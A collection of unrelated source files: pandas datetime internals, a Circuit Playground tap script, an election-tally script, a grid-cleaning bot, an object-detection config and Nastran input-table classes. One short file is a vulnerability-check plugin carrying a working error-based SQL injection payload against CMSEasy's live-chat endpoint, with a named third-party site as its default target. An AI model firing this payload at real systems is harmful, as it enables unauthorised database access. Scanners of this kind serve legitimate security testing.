from pandas.core.arrays import PeriodArray
if self.tz is not None:
warnings.warn("Converting to PeriodArray/Index representation "
"will drop timezone information.", UserWarning)
if freq is None:
freq = self.freqstr or self.inferred_freq
if freq is None:
raise ValueError("You must pass a freq argument as "
"current index has none.")
freq = get_period_alias(freq)
return PeriodArray._from_datetime64(self._data, freq, tz=self.tz)
def to_perioddelta(self, freq):
"""
Calculate TimedeltaArray of difference between index
values and index converted to PeriodArray at specified
freq. Used for vectorized offsets
Parameters
----------
freq: Period frequency
Returns
-------
TimedeltaArray/Index
"""
# TODO: consider privatizing (discussion in GH#23113)
from pandas.core.arrays.timedeltas import TimedeltaArrayMixin
i8delta = self.asi8 - self.to_period(freq).to_timestamp().asi8
m8delta = i8delta.view('m8[ns]')
return TimedeltaArrayMixin(m8delta)
# -----------------------------------------------------------------
# Properties - Vectorized Timestamp Properties/Methods
def month_name(self, locale=None):
"""
Return the month names of the DateTimeIndex with specified locale.
.. versionadded:: 0.23.0
Parameters
----------
locale : str, optional
Locale determining the language in which to return the month name.
Default is English locale.
Returns
-------
Index
Index of month names.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2018-01', freq='M', periods=3)
>>> idx
DatetimeIndex(['2018-01-31', '2018-02-28', '2018-03-31'],
dtype='datetime64[ns]', freq='M')
>>> idx.month_name()
Index(['January', 'February', 'March'], dtype='object')
"""
if self.tz is not None and self.tz is not utc:
values = self._local_timestamps()
else:
values = self.asi8
result = fields.get_date_name_field(values, 'month_name',
locale=locale)
result = self._maybe_mask_results(result, fill_value=None)
return result
def day_name(self, locale=None):
"""
Return the day names of the DateTimeIndex with specified locale.
.. versionadded:: 0.23.0
Parameters
----------
locale : str, optional
Locale determining the language in which to return the day name.
Default is English locale.
Returns
-------
Index
Index of day names.
Examples
--------
>>> idx = pd.DatetimeIndex(start='2018-01-01', freq='D', periods=3)
>>> idx
DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03'],
dtype='datetime64[ns]', freq='D')
>>> idx.day_name()
Index(['Monday', 'Tuesday', 'Wednesday'], dtype='object')
"""
if self.tz is not None and self.tz is not utc:
values = self._local_timestamps()
else:
values = self.asi8
result = fields.get_date_name_field(values, 'day_name',
locale=locale)
result = self._maybe_mask_results(result, fill_value=None)
return result
@property
def time(self):
"""
Returns numpy array of datetime.time. The time part of the Timestamps.
"""
# If the Timestamps have a timezone that is not UTC,
# convert them into their i8 representation while
# keeping their timezone and not using UTC
if self.tz is not None and self.tz is not utc:
timestamps = self._local_timestamps()
else:
timestamps = self.asi8
return tslib.ints_to_pydatetime(timestamps, box="time")
@property
def timetz(self):
"""
Returns numpy array of datetime.time also containing timezone
information. The time part of the Timestamps.
"""
return tslib.ints_to_pydatetime(self.asi8, self.tz, box="time")
@property
def date(self):
"""
Returns numpy array of python datetime.date objects (namely, the date
part of Timestamps without timezone information).
"""
# If the Timestamps have a timezone that is not UTC,
# convert them into their i8 representation while
# keeping their timezone and not using UTC
if self.tz is not None and self.tz is not utc:
timestamps = self._local_timestamps()
else:
timestamps = self.asi8
return tslib.ints_to_pydatetime(timestamps, box="date")
year = _field_accessor('year', 'Y', "The year of the datetime")
month = _field_accessor('month', 'M',
"The month as January=1, December=12")
day = _field_accessor('day', 'D', "The days of the datetime")
hour = _field_accessor('hour', 'h', "The hours of the datetime")
minute = _field_accessor('minute', 'm', "The minutes of the datetime")
second = _field_accessor('second', 's', "The seconds of the datetime")
microsecond = _field_accessor('microsecond', 'us',
"The microseconds of the datetime")
nanosecond = _field_accessor('nanosecond', 'ns',
"The nanoseconds of the datetime")
weekofyear = _field_accessor('weekofyear', 'woy',
"The week ordinal of the year")
week = weekofyear
_dayofweek_doc = """
The day of the week with Monday=0, Sunday=6.
Return the day of the week. It is assumed the week starts on
Monday, which is denoted by 0 and ends on Sunday which is denoted
by 6. This method is available on both Series with datetime
values (using the `dt` accessor) and DatetimeIndex.
See Also
--------
Series.dt.dayofweek : Alias.
Series.dt.weekday : Alias.
Series.dt.day_name : Returns the name of the day of the week.
Returns
-------
Series or Index
Containing integers indicating the day number.
Examples
--------
>>> s = pd.date_range('2016-12-31', '2017-01-08', freq='D').to_series()
>>> s.dt.dayofweek
2016-12-31 5
2017-01-01 6
2017-01-02 0
2017-01-03 1
2017-01-04 2
2017-01-05 3
2017-01-06 4
2017-01-07 5
2017-01-08 6
Freq: D, dtype: int64
"""
dayofweek = _field_accessor('dayofweek', 'dow', _dayofweek_doc)
weekday = dayofweek
weekday_name = _field_accessor(
'weekday_name',
'weekday_name',
"The name of day in a week (ex: Friday)\n\n.. deprecated:: 0.23.0")
dayofyear = _field_accessor('dayofyear', 'doy',
"The ordinal day of the year")
quarter = _field_accessor('quarter', 'q', "The quarter of the date")
days_in_month = _field_accessor(
'days_in_month',
'dim',
"The number of days in the month")
daysinmonth = days_in_month
_is_month_doc = """
Indicates whether the date is the {first_or_last} day of the month.
Returns
-------
Series or array
For Series, returns a Series with boolean values.
For DatetimeIndex, returns a boolean array.
See Also
--------
is_month_start : Return a boolean indicating whether the date
is the first day of the month.
is_month_end : Return a boolean indicating whether the date
is the last day of the month.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> s = pd.Series(pd.date_range("2018-02-27", periods=3))
>>> s
0 2018-02-27
1 2018-02-28
2 2018-03-01
dtype: datetime64[ns]
>>> s.dt.is_month_start
0 False
1 False
2 True
dtype: bool
>>> s.dt.is_month_end
0 False
1 True
2 False
dtype: bool
>>> idx = pd.date_range("2018-02-27", periods=3)
>>> idx.is_month_start
array([False, False, True])
>>> idx.is_month_end
array([False, True, False])
"""
is_month_start = _field_accessor(
'is_month_start',
'is_month_start',
_is_month_doc.format(first_or_last='first'))
is_month_end = _field_accessor(
'is_month_end',
'is_month_end',
_is_month_doc.format(first_or_last='last'))
is_quarter_start = _field_accessor(
'is_quarter_start',
'is_quarter_start',
"""
Indicator for whether the date is the first day of a quarter.
Returns
-------
is_quarter_start : Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
quarter : Return the quarter of the date.
is_quarter_end : Similar property indicating the quarter end.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> df = pd.DataFrame({'dates': pd.date_range("2017-03-30",
... periods=4)})
>>> df.assign(quarter=df.dates.dt.quarter,
... is_quarter_start=df.dates.dt.is_quarter_start)
dates quarter is_quarter_start
0 2017-03-30 1 False
1 2017-03-31 1 False
2 2017-04-01 2 True
3 2017-04-02 2 False
>>> idx = pd.date_range('2017-03-30', periods=4)
>>> idx
DatetimeIndex(['2017-03-30', '2017-03-31', '2017-04-01', '2017-04-02'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_quarter_start
array([False, False, True, False])
""")
is_quarter_end = _field_accessor(
'is_quarter_end',
'is_quarter_end',
"""
Indicator for whether the date is the last day of a quarter.
Returns
-------
is_quarter_end : Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
quarter : Return the quarter of the date.
is_quarter_start : Similar property indicating the quarter start.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> df = pd.DataFrame({'dates': pd.date_range("2017-03-30",
... periods=4)})
>>> df.assign(quarter=df.dates.dt.quarter,
... is_quarter_end=df.dates.dt.is_quarter_end)
dates quarter is_quarter_end
0 2017-03-30 1 False
1 2017-03-31 1 True
2 2017-04-01 2 False
3 2017-04-02 2 False
>>> idx = pd.date_range('2017-03-30', periods=4)
>>> idx
DatetimeIndex(['2017-03-30', '2017-03-31', '2017-04-01', '2017-04-02'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_quarter_end
array([False, True, False, False])
""")
is_year_start = _field_accessor(
'is_year_start',
'is_year_start',
"""
Indicate whether the date is the first day of a year.
Returns
-------
Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
is_year_end : Similar property indicating the last day of the year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> dates = pd.Series(pd.date_range("2017-12-30", periods=3))
>>> dates
0 2017-12-30
1 2017-12-31
2 2018-01-01
dtype: datetime64[ns]
>>> dates.dt.is_year_start
0 False
1 False
2 True
dtype: bool
>>> idx = pd.date_range("2017-12-30", periods=3)
>>> idx
DatetimeIndex(['2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_year_start
array([False, False, True])
""")
is_year_end = _field_accessor(
'is_year_end',
'is_year_end',
"""
Indicate whether the date is the last day of the year.
Returns
-------
Series or DatetimeIndex
The same type as the original data with boolean values. Series will
have the same name and index. DatetimeIndex will have the same
name.
See Also
--------
is_year_start : Similar property indicating the start of the year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> dates = pd.Series(pd.date_range("2017-12-30", periods=3))
>>> dates
0 2017-12-30
1 2017-12-31
2 2018-01-01
dtype: datetime64[ns]
>>> dates.dt.is_year_end
0 False
1 True
2 False
dtype: bool
>>> idx = pd.date_range("2017-12-30", periods=3)
>>> idx
DatetimeIndex(['2017-12-30', '2017-12-31', '2018-01-01'],
dtype='datetime64[ns]', freq='D')
>>> idx.is_year_end
array([False, True, False])
""")
is_leap_year = _field_accessor(
'is_leap_year',
'is_leap_year',
"""
Boolean indicator if the date belongs to a leap year.
A leap year is a year which has 366 days (instead of 365), including
the 29th of February as an intercalary day.
Leap years are years which are multiples of four with the exception
of years divisible by 100 but not by 400.
Returns
-------
Series or ndarray
Booleans indicating if dates belong to a leap year.
Examples
--------
This method is available on Series with datetime values under
the ``.dt`` accessor, and directly on DatetimeIndex.
>>> idx = pd.date_range("2012-01-01", "2015-01-01", freq="Y")
>>> idx
DatetimeIndex(['2012-12-31', '2013-12-31', '2014-12-31'],
dtype='datetime64[ns]', freq='A-DEC')
>>> idx.is_leap_year
array([ True, False, False], dtype=bool)
>>> dates_series = pd.Series(idx)
>>> dates_series
0 2012-12-31
1 2013-12-31
2 2014-12-31
dtype: datetime64[ns]
>>> dates_series.dt.is_leap_year
0 True
1 False
2 False
dtype: bool
""")
def to_julian_date(self):
"""
Convert Datetime Array to float64 ndarray of Julian Dates.
Julian Date 0 is noon on January 1, 4713 BC.
http://en.wikipedia.org/wiki/Julian_day
"""
# http://mysite.verizon.net/aesir_research/date/jdalg2.htm
year = np.asarray(self.year)
month = np.asarray(self.month)
day = np.asarray(self.day)
testarr = month < 3
year[testarr] -= 1
month[testarr] += 12
return (day +
np.fix((153 * month - 457) / 5) +
365 * year +
np.floor(year / 4) -
np.floor(year / 100) +
np.floor(year / 400) +
1721118.5 +
(self.hour +
self.minute / 60.0 +
self.second / 3600.0 +
self.microsecond / 3600.0 / 1e+6 +
self.nanosecond / 3600.0 / 1e+9
) / 24.0)
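# Worked check (illustrative note, not in the original source): the J2000.0
# epoch, 2000-01-01 12:00, has Julian Date 2451545.0, which the formula
# above reproduces, e.g.
#   >>> pd.DatetimeIndex(['2000-01-01 12:00']).to_julian_date()
#   Float64Index([2451545.0], dtype='float64')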
DatetimeArrayMixin._add_comparison_ops()
DatetimeArrayMixin._add_datetimelike_methods()
def _generate_regular_range(cls, start, end, periods, freq):
"""
Generate a range of dates with the spans between dates described by
the given `freq` DateOffset.
Parameters
----------
cls : class
start : Timestamp or None
first point of produced date range
end : Timestamp or None
last point of produced date range
periods : int
number of periods in produced date range
freq : DateOffset
describes space between dates in produced date range
Returns
-------
ndarray[np.int64] representing nanosecond unix timestamps
"""
if isinstance(freq, Tick):
stride = freq.nanos
if periods is None:
b = Timestamp(start).value
# cannot just use e = Timestamp(end) + 1 because arange breaks when
# stride is too large, see GH10887
e = (b + (Timestamp(end).value - b) // stride * stride +
stride // 2 + 1)
# end.tz == start.tz by this point due to _generate implementation
tz = start.tz
elif start is not None:
b = Timestamp(start).value
e = _generate_range_overflow_safe(b, periods, stride, side='start')
tz = start.tz
elif end is not None:
e = Timestamp(end).value + stride
b = _generate_range_overflow_safe(e, periods, stride, side='end')
tz = end.tz
else:
raise ValueError("at least 'start' or 'end' should be specified "
"if a 'period' is given.")
values = np.arange(b, e, stride, dtype=np.int64)
else:
tz = None
# start and end should have the same timezone by this point
if start is not None:
tz = start.tz
elif end is not None:
tz = end.tz
xdr = generate_range(start=start, end=end,
periods=periods, offset=freq)
values = np.array([x.value for x in xdr], dtype=np.int64)
data = cls._simple_new(values, freq=freq, tz=tz)
return data
def _generate_range_overflow_safe(endpoint, periods, stride, side='start'):
"""
Calculate the second endpoint for passing to np.arange, checking
to avoid an integer overflow. Catch OverflowError and re-raise
as OutOfBoundsDatetime.
Parameters
----------
endpoint : int
periods : int
stride : int
side : {'start', 'end'}
Returns
-------
other_end : int
Raises
------
OutOfBoundsDatetime
"""
# GH#14187 raise instead of incorrectly wrapping around
assert side in ['start', 'end']
if side == 'end':
stride *= -1
try:
other_end = checked_add_with_arr(np.int64(endpoint),
np.int64(periods) * stride)
except OverflowError:
raise tslib.OutOfBoundsDatetime('Cannot generate range with '
'{side}={endpoint} and '
'periods={periods}'
.format(side=side, endpoint=endpoint,
periods=periods))
return other_end
def _infer_tz_from_endpoints(start, end, tz):
"""
If a timezone is not explicitly given via `tz`, see if one can
be inferred from the `start` and `end` endpoints. If more than one
of these inputs provides a timezone, require that they all agree.
Parameters
----------
start : Timestamp
end : Timestamp
tz : tzinfo or None
Returns
-------
tz : tzinfo or None
inferred_tz : tzinfo or None
Raises
------
TypeError : if start and end timezones do not agree
"""
try:
inferred_tz = timezones.infer_tzinfo(start, end)
except Exception:
raise TypeError('Start and end cannot both be tz-aware with '
'different timezones')
inferred_tz = timezones.maybe_get_tz(inferred_tz)
tz = timezones.maybe_get_tz(tz)
if tz is not None and inferred_tz is not None:
if not timezones.tz_compare(inferred_tz, tz):
raise AssertionError("Inferred time zone not equal to passed "
"time zone")
elif inferred_tz is not None:
tz = inferred_tz
return tz, inferred_tz
def _maybe_normalize_endpoints(start, end, normalize):
_normalized = True
if start is not None:
if normalize:
start = normalize_date(start)
_normalized = True
else:
_normalized = _normalized and start.time() == _midnight
if end is not None:
if normalize:
end = normalize_date(end)
_normalized = True
else:
_normalized = _normalized and end.time() == _midnight
return start, end, _normalized
def _maybe_localize_point(ts, is_none, is_not_none, freq, tz):
"""
Localize a start or end Timestamp to the timezone of the corresponding
start or end Timestamp
Parameters
----------
ts : start or end Timestamp to potentially localize
is_none : argument that should be None
is_not_none : argument that should not be None
freq : Tick, DateOffset, or None
tz : str, timezone object or None
Returns
-------
ts : Timestamp
"""
# Make sure start and end are timezone localized if:
# 1) freq = a Timedelta-like frequency (Tick)
# 2) freq = None i.e. generating a linspaced range
if isinstance(freq, Tick) or freq is None:
localize_args = {'tz': tz, 'ambiguous': False}
else:
localize_args = {'tz': None}
if is_none is None and is_not_none is not None:
ts = ts.tz_localize(**localize_args)
return ts
|
the-stack_106_23219 | from adafruit_circuitplayground.express import cpx
# Set to check for single-taps.
cpx.detect_taps = 1
tap_count = 0
# We're looking for 2 single-taps before moving on.
while tap_count < 2:
if cpx.tapped:
print("Single-tap!")
tap_count += 1
print("Reached 2 single-taps!")
# Now switch to checking for double-taps.
tap_count = 0
cpx.detect_taps = 2
# We're looking for 2 double-taps before moving on.
while tap_count < 2:
if cpx.tapped:
print("Double-tap!")
tap_count += 1
print("Reached 2 double-taps!")
cpx.red_led = True
print("Done.")
|
the-stack_106_23220 | import re
def assign(service,arg):
if service == 'cmseasy':
return True,arg
def audit(arg):
url = arg + '/celive/live/header.php'
payload = ("xajax=LiveMessage&xajaxargs[0]=<xjxobj><q><e><k>name</k><v>%27,"
"(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(md5(1))),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20</v></e></q></xjxobj>")
code,head,body,errcode,fina_url=curl.curl('-d "%s" %s'%(payload,url))
if code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in body:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('cmseasy','http://www.mldclub.com.cn/')[1])
|
the-stack_106_23224 | # model settings
model = dict(
type='FastRCNN',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
roi_head=dict(
type='StandardRoIHead',
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0))),
# model training and testing settings
train_cfg=dict(
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
match_low_quality=False,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=512,
pos_fraction=0.25,
neg_pos_ub=-1,
add_gt_as_proposals=True),
pos_weight=-1,
debug=False)),
test_cfg=dict(
rcnn=dict(
score_thr=0.05,
nms=dict(type='nms', iou_threshold=0.5),
max_per_img=100)))
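# Usage sketch (an assumption, not part of the config itself): a config like
# this is normally consumed through mmcv, for example
#   from mmcv import Config
#   cfg = Config.fromfile('fast_rcnn_r50_fpn_1x_coco.py')  # hypothetical file name
#   print(cfg.model.roi_head.bbox_head.num_classes)  # 80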
|
the-stack_106_23225 | import csv
import os
voter = 0
khan = 0
correy = 0
li = 0
OTooley = 0
# read csv file
with open('Resources/election_data.csv', newline='', encoding="utf-8") as FreeBritney:
# Create variable to store contents of budget_data.csv
Free = csv.reader(FreeBritney, delimiter = ',')
# Start the second row by skipping the first row
Britney = next(FreeBritney)
# Iterate through the rows in the stored file contents
for row in Free:
# Total votes
voter +=1
# IF statement to count number of vote casted for each candidate
if row[2] == "Khan":
khan +=1
elif row[2] == "Correy":
correy +=1
elif row[2] == "Li":
li +=1
elif row[2] == "O'Tooley":
OTooley +=1
# create lists of the candidates and the number of votes cast for each candidate
candidates = ["Khan", "Correy", "Li","O'Tooley"]
votes = [khan, correy, li, OTooley]
# Zip them together into a dictionary, then
# return the winner using max() on the dictionary, keyed by vote count
OopsIDidItAgain = dict(zip(candidates,votes))
Lucky = max(OopsIDidItAgain, key=OopsIDidItAgain.get)
# Print the summary of the analysis
khan_percent = (khan/voter) *100
correy_percent = (correy/voter) * 100
li_percent = (li/voter) * 100
otooley_percent = (OTooley/voter) * 100
print('Election Results')
print("----------------------------")
print(f"The total number of votes cast is: {voter}")
print("----------------------------")
print(f"Khan: {khan_percent:.3f} % ({khan})")
print(f"Correy: {correy_percent:.3f} % ({correy})")
print(f"Li: {li_percent:.3f} % ({li})")
print(f"O'Tooley: {otooley_percent:.3f} % ({OTooley})")
print("----------------------------")
print(f"The Winner is: {Lucky}")
print(f"----------------------------")
# export a text file with the results.
from pathlib import Path
output = Path("Resources", "Election Results.txt")
with open(output,"w") as analysis:
# Print results to txt file
analysis.write("Election Results")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"The total number of votes cast is: {voter}")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"Khan: {khan_percent:.3f} % ({khan})")
analysis.write("\n")
analysis.write(f"Correy: {correy_percent:.3f} % ({correy})")
analysis.write("\n")
analysis.write(f"Li: {li_percent:.3f} % ({li})")
analysis.write("\n")
analysis.write(f"O'Tooley: {otooley_percent:.3f} % ({OTooley})")
analysis.write("\n")
analysis.write("----------------------------")
analysis.write("\n")
analysis.write(f"The Winner is: ({Lucky})")
analysis.write("\n")
analysis.write("----------------------------")
|
the-stack_106_23227 | #!/usr/bin/python
"""
The goal of Artificial Intelligence is to create a rational agent (Artificial Intelligence 1.1.4). An agent gets input from the environment through sensors and acts on the environment with actuators. In this challenge, you will program a simple bot to perform the correct actions based on environmental input.
Meet the bot MarkZoid. It's a cleaning bot whose sensor is a head mounted camera and whose actuators are the wheels beneath it. It's used to clean the floor.
The bot here is positioned at the top left corner of a 5*5 grid. Your task is to move the bot to clean all the dirty cells.
Input Format
The first line contains two space separated integers which indicate the current position of the bot.
The board is indexed using Matrix Convention
5 lines follow representing the grid. Each cell in the grid is represented by any of the following 3 characters: 'b' (ascii value 98) indicates the bot's current position, 'd' (ascii value 100) indicates a dirty cell and '-' (ascii value 45) indicates a clean cell in the grid.
Note If the bot is on a dirty cell, the cell will still have 'd' on it.
Output Format
The output is the action that is taken by the bot in the current step, and it can be either one of the movements in 4 directions or cleaning up the cell in which it is currently located. The valid output strings are LEFT, RIGHT, UP and DOWN or CLEAN. If the bot ever reaches a dirty cell, output CLEAN to clean the dirty cell. Repeat this process until all the cells on the grid are cleaned.
Sample Input #00
0 0
b---d
-d--d
--dd-
--d--
----d
Sample Output #00
RIGHT
Resultant state
-b--d
-d--d
--dd-
--d--
----d
Sample Input #01
0 1
-b--d
-d--d
--dd-
--d--
----d
Sample Output #01
DOWN
Resultant state
----d
-d--d
--dd-
--d--
----d
Task
Complete the function next_move, which takes 3 parameters: posr and posc, the coordinates of the bot's current position, and board, the current board state. It should print the bot's next move.
The codechecker will keep calling the function next_move till the game is over or you make an invalid move.
Scoring
Your score is (200 - number of moves the bot makes)/40. CLEAN is considered a move as well.
Once you submit, your bot will be played on four grids with three of the grid configurations unknown to you. The final score will be the sum of the scores obtained in each of the four grids.
Education Links
Introduction to AI by Stuart Russell and Peter Norvig
Motor cognition
Solved score: 17.82pts
https://www.hackerrank.com/challenges/botclean/problem
"""
# Head ends here
import math
def next_move(posr, posc, board):
dps = []
p = [0,0]
b = [posr,posc]
if board[posr][posc] == 'd':
print("CLEAN")
return
for row in range(len(board)):
for col in range(len(board)):
if board[row][col] == 'd':
dps.append([row, col])
    dps.sort(key=lambda dpos: math.sqrt((dpos[0] - b[0])**2 + (dpos[1] - b[1])**2))
p = dps[0]
# print(p, b)
# going to the same row
if p[0] > b[0]:
print("DOWN")
return
    elif p[0] < b[0]:
print("UP")
return
# going to the same column
if p[1] > b[1]:
print("RIGHT")
return
    elif p[1] < b[1]:
print("LEFT")
return
# Tail starts here
if __name__ == "__main__":
pos = [int(i) for i in input().strip().split()]
board = [[j for j in input().strip()] for i in range(5)]
next_move(pos[0], pos[1], board)
|
the-stack_106_23230 | def notas(*notas, sit=False):
"""
    -> Function to analyze the grades and status of several students.
    :param *notas: one or more grades of the students
    :param sit: optional value indicating whether or not to add the status
    :return: dictionary with several pieces of information about the class status
"""
d = {'total': len(notas), 'maior': max(notas), 'menor': min(notas), 'média': sum(notas) / len(notas)}
    if sit:
if d['média'] < 5: d['situação'] = 'ruim'
elif d['média'] < 7: d['situação'] = 'aceitável'
elif d['média'] < 9: d['situação'] = 'boa'
else: d['situação'] = 'excelente'
return d
resp = notas(5.5, 9.5, 10, 6.5, sit=True)
print(f'\n{resp}\n')
|
the-stack_106_23231 | from __future__ import print_function, absolute_import
from collections import defaultdict
from six.moves import range
from six import iteritems
from h5Nastran.defaults import Defaults
from h5Nastran.h5nastrannode import H5NastranNode
from .input_table import InputTable, TableDef
class Dynamic(H5NastranNode):
def __init__(self, h5n, input):
self._h5n = h5n
self._input = input
self.eigr = EIGR(self._h5n, self)
self.eigrl = EIGRL(self._h5n, self)
self.freq = FREQ(self._h5n, self)
self.freq1 = FREQ1(self._h5n, self)
self.randps = RANDPS(self._h5n, self)
def path(self):
return self._input.path() + ['DYNAMIC']
def to_bdf(self, bdf):
for key, item in iteritems(self.__dict__):
if key.startswith('_'):
continue
try:
item.to_bdf(bdf)
except NotImplementedError:
pass
########################################################################################################################
class EIGR(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/EIGR')
def to_bdf(self, bdf):
add_card = bdf.add_eigr
identity = self.identity
sid = identity['SID']
method = identity['METHOD']
f1 = identity['F1']
f2 = identity['F2']
ne = identity['NE']
nd = identity['ND']
norm = identity['NORM']
g = identity['G']
c = identity['C']
to_value_int = self._h5n.defaults.to_value_int
for i in range(sid.size):
_g = to_value_int(g[i])
_c = to_value_int(c[i])
add_card(sid[i], method[i].decode(), f1[i], f2[i], ne[i], nd[i], norm[i].decode(), _g, _c)
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {'IDENTITY': {'SID': [], 'METHOD': [], 'F1': [], 'F2': [], 'NE': [], 'ND': [], 'NORM': [],
'G': [], 'C': [], 'DOMAIN_ID': []}}
identity = result['IDENTITY']
sid = identity['SID']
method = identity['METHOD']
f1 = identity['F1']
f2 = identity['F2']
ne = identity['NE']
nd = identity['ND']
norm = identity['NORM']
g = identity['G']
c = identity['C']
get_value_int = self._h5n.defaults.get_value_int
for card_id in card_ids:
card = cards[card_id]
sid.append(card.sid)
method.append(card.method)
f1.append(card.f1)
f2.append(card.f2)
ne.append(get_value_int(card.ne))
nd.append(get_value_int(card.nd))
norm.append(card.norm)
g.append(get_value_int(card.G))
c.append(get_value_int(card.C))
return result
########################################################################################################################
class EIGRL(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/EIGRL/IDENTITY')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
freqs = {'IDENTITY': {'FI': []}}
result = {'IDENTITY': {'SID': [], 'V1': [], 'V2': [], 'ND': [], 'MSGLVL': [], 'MAXSET': [],
'SHFSCL': [], 'FLAG1': [], 'FLAG2': [], 'NORM': [], 'ALPH': [], 'FREQS_POS': [],
'FREQS_LEN': [], 'DOMAIN_ID': []},
'FREQS': freqs,
'_subtables': ['FREQS']}
fi = freqs['IDENTITY']['FI']
identity = result['IDENTITY']
sid = identity['SID']
v1 = identity['V1']
v2 = identity['V2']
nd = identity['ND']
msglvl = identity['MSGLVL']
maxset = identity['MAXSET']
shfscl = identity['SHFSCL']
flag1 = identity['FLAG1']
flag2 = identity['FLAG2']
norm = identity['NORM']
alph = identity['ALPH']
freqs_pos = identity['FREQS_POS']
freqs_len = identity['FREQS_LEN']
def _get_option(val, option, option_data, default):
if val in ('', None):
val = option_data.get(option, None)
if val is None:
val = default
return val
_pos = 0
for card_id in card_ids:
card = cards[card_id]
option_data = defaultdict(list)
for i in range(len(card.options)):
option_data[card.options[i]].append(card.values[i])
_v1 = _get_option(card.v1, 'V1', option_data, Defaults.default_double)
_v2 = _get_option(card.v2, 'V2', option_data, Defaults.default_double)
_nd = _get_option(card.nd, 'ND', option_data, Defaults.default_int)
_msglvl = _get_option(card.msglvl, 'MSGLVL', option_data, Defaults.default_int)
_maxset = _get_option(card.maxset, 'MAXSET', option_data, Defaults.default_int)
_shfscl = _get_option(card.shfscl, 'SHFSCL', option_data, Defaults.default_double)
_norm = _get_option(card.norm, 'NORM', option_data, Defaults.default_str)
_alph = _get_option(None, 'ALPH', option_data, Defaults.default_double)
# TODO: EIGRL how is nums used?, what is flag1 and flag2?
# _nums = _get_option(None, 'NUMS', option_data, 1)
_fi = _get_option(None, 'Fi', option_data, [])
sid.append(card.sid)
v1.append(_v1)
v2.append(_v2)
nd.append(_nd)
msglvl.append(_msglvl)
maxset.append(_maxset)
shfscl.append(_shfscl)
norm.append(_norm)
alph.append(_alph)
flag1.append(Defaults.unknown_int)
flag2.append(Defaults.unknown_int)
freqs_pos.append(_pos)
_len = len(_fi)
_pos += _len
freqs_len.append(_len)
fi += _fi
return result
########################################################################################################################
class FREQ(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/FREQ/IDENTITY')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
freqs = {'IDENTITY': {'F': []}}
result = {'IDENTITY': {'SID': [], 'FREQS_POS': [], 'FREQS_LEN': [], 'DOMAIN_ID': []},
'FREQS': freqs,
'_subtables': ['FREQS']}
f = freqs['IDENTITY']['F']
identity = result['IDENTITY']
sid = identity['SID']
freqs_pos = identity['FREQS_POS']
freqs_len = identity['FREQS_LEN']
pos = 0
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
freqs_pos.append(pos)
_len = len(card.freqs)
freqs_len.append(_len)
pos += _len
f.extend(card.freqs)
return result
########################################################################################################################
class FREQ1(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/FREQ1')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {'IDENTITY': {'SID': [], 'F1': [], 'DF': [], 'NDF': [], 'DOMAIN_ID': []}}
identity = result['IDENTITY']
sid = identity['SID']
f1 = identity['F1']
df = identity['DF']
ndf = identity['NDF']
for card_id in card_ids:
card_list = cards[card_id]
for card in card_list:
sid.append(card.sid)
f1.append(card.f1)
df.append(card.df)
ndf.append(card.ndf)
return result
########################################################################################################################
class RANDPS(InputTable):
table_def = TableDef.create('/NASTRAN/INPUT/DYNAMIC/RANDPS')
def from_bdf(self, cards):
card_ids = sorted(cards.keys())
result = {
'IDENTITY': {'SID': [], 'J': [], 'K': [], 'X': [], 'Y': [], 'TID': [], 'DOMAIN_ID': []}
}
i = result['IDENTITY']
sid = i['SID']
j = i['J']
k = i['K']
